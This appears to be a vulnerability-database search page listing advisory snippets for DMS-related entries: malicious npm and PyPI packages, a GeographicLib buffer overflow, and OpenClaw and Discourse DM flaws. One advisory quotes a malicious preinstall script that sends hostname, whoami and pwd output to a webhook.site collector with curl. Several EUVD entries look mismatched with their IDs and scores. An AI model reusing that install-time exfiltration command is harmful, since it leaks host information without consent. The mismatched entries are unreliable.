215 matches found

OSV
added 2026/06/15 8:8 p.m. | 5 views

MAL-2026-5826 Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

5.3 AI score
Exploits: 0 | References: 1
OSV
added 2026/06/15 9:40 a.m. | 4 views

MAL-2026-5775 Malicious code in ckanext-dms (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 5bce6d55a65fbab98cd93d6109b563f49e9557b542a8b9c2fd68e25755b7089e Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

5.7 AI score
Exploits: 0 | References: 1
GithubExploit
added 2026/05/04 1:28 a.m. | 67 views

Exploit for CVE-2025-60751

CVE-2025-60751: GeographicLib Stack-based Buffer Overflow 📌...

7.5 CVSS | 5.8 AI score | 0.02182 EPSS
Exploits: 3
vulnersOsv
added 2026/04/29 12:33 p.m. | 14 views

ai.ancf.lmos:lmos-operator (>=0.5.0 <=0.6.0), ai.telosforge:kimaira-starter-dms (>=1.2.4 <=1.2.6) +5089 more potentially affected by CVE-2026-22741 via org.springframework:spring-webmvc (>=6.2.0 <=6.2.17)

org.springframework:spring-webmvc MAVEN version =6.2.0, =0.5.0, =1.2.4, =1.2.4, =1.17.0, =0.3.0, =0.0.1, =0.1.0, =0.1.0, =0.1.0, =8.6.0, =8.6.0, =8.6.0, =8.6.0, =8.6.0, =8.8.1 and more Source cves: CVE-2026-22741 Source advisory: OSV:GHSA-WG35-8JPF-2XV3...

3.1 CVSS | 5.4 AI score | 0.00236 EPSS
Exploits: 0
OSV
added 2026/04/07 6:14 p.m. | 2 views

GHSA-H43V-27WG-5MF9 OpenClaw: Forged Nostr DMs could create pairing state before signature verification

Summary Before OpenClaw 2026.3.31, the Nostr DM ingress path could issue pairing challenges before validating the event signature. A forged DM could create a pending pairing entry and trigger a pairing-reply attempt before signature rejection. Impact An unauthenticated remote sender could consume...

6.9 CVSS | 5.8 AI score | 0.00253 EPSS
Exploits: 0 | References: 5
Github Security Blog
added 2026/03/26 7:8 p.m. | 5 views

OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement

Summary Nostr inbound DM handling could perform crypto and dispatch work before sender and pairing policy enforcement, enabling unauthorized pre-auth computation. Affected Packages / Versions - Package: openclaw npm - Affected: = 2026.3.22 - Latest released tag checked: v2026.3.23-2...

8.2 CVSS | 5.8 AI score | 0.00454 EPSS
Exploits: 0 | References: 6 | Affected Software: 1
ATTACKERKB
added 2026/02/26 9:16 p.m. | 3 views

CVE-2026-27153

Discourse is an open source discussion platform. Prior to versions 2025.12.2, 2026.1.1, and 2026.2.0, moderators could export user Chat DMs via the CSV export endpoint by exploiting an overly permissive allowlist in can_export_entity?. The method allowed moderators to export any entity not explicit...

5.3 CVSS | 5.8 AI score | 0.00158 EPSS
Exploits: 0 | References: 2 | Affected Software: 1
CVE
added 2026/02/26 9:16 p.m. | 20 views

CVE-2026-27153

Discourse (open source discussion platform) is affected prior to versions 2025.12.2, 2026.1.1, and 2026.2.0. The issue arises from an overly permissive allowlist in can_export_entity?, letting moderators export any entity not explicitly blocked via the CSV export endpoint to access user Chat DMs....

5.3 CVSS | 5.5 AI score | 0.00158 EPSS
Exploits: 0 | References: 1 | Affected Software: 1
RedhatCVE
added 2026/01/09 12:25 p.m. | 6 views

CVE-2018-12273

The /edit URI in the DMS component in Ximdex 4.0 has XSS via the Ciudad or Nombre parameter...

6.1 CVSS | 5.9 AI score | 0.00865 EPSS
Exploits: 1 | References: 1
RedhatCVE
added 2026/01/09 10:53 a.m. | 33 views

CVE-2022-33139

A vulnerability has been identified in Cerberus DMS All versions, Desigo CC All versions, Desigo CC Compact All versions, SIMATIC WinCC OA V3.16 All versions in default configuration, SIMATIC WinCC OA V3.17 All versions in non-default configuration, SIMATIC WinCC OA V3.18 All versions in...

9.8 CVSS | 7 AI score | 0.01166 EPSS
Exploits: 0 | References: 1
OSV
added 2025/10/21 4:15 p.m. | 2 views

DEBIAN-CVE-2025-60751

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode...

7.5 CVSS | 5.2 AI score | 0.02182 EPSS
Exploits: 3 | References: 1
OSV
added 2025/10/21 4:15 p.m. | 2 views

UBUNTU-CVE-2025-60751

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode...

7.5 CVSS | 5.8 AI score | 0.02182 EPSS
Exploits: 3 | References: 5
Snyk
added 2025/10/21 3:41 p.m. | 5 views

Buffer Overflow

Overview: Affected versions of this package are vulnerable to Buffer Overflow in the DMS::InternalDecode function. An attacker can hijack the program's control flow by overwriting a return address to point to a libc function (ret2libc) and execute arbitrary code or cause a crash by providing special...

8.8 CVSS | 6.3 AI score | 0.02182 EPSS
Exploits: 3 | References: 2
Vulnrichment
added 2025/10/21 12:0 a.m. | 2 views

CVE-2025-60751

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode...

6.6 AI score | 0.02182 EPSS
Exploits: 3 | References: 2
CNNVD
added 2025/10/21 12:0 a.m. | 3 views

GeographicLib Security Vulnerability

GeographicLib is a C language library from the GeographicLib open source. A security vulnerability exists in GeographicLib version 2.5, which originates from a buffer overflow in GeoConvert DMS::InternalDecode...

7.5 CVSS | 7 AI score | 0.02182 EPSS
Exploits: 3 | References: 4
Debian CVE
added 2025/10/21 12:0 a.m. | 6 views

CVE-2025-60751

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode...

7.5 CVSS | 5.2 AI score | 0.02182 EPSS
Exploits: 3
EUVD
added 2025/10/07 12:30 a.m. | 5 views

EUVD-2018-4249

Malware in sbrugna...

6.1 CVSS | 6.3 AI score | 0.00865 EPSS
Exploits: 1 | References: 2
EUVD
added 2025/10/07 12:30 a.m. | 4 views

EUVD-2021-23755

Malware in sbrugna...

10 CVSS | 8.9 AI score | 0.01829 EPSS
Exploits: 0 | References: 2
EUVD
added 2025/10/07 12:30 a.m. | 1 views

EUVD-2004-1527

Malware in sbrugna...

5 CVSS | 6.4 AI score | 0.07541 EPSS
Exploits: 1 | References: 6
EUVD
added 2025/10/07 12:30 a.m. | 2 views

EUVD-2008-0819

Malware in sbrugna...

6.4 CVSS | 6.4 AI score | 0.02286 EPSS
Exploits: 1 | References: 5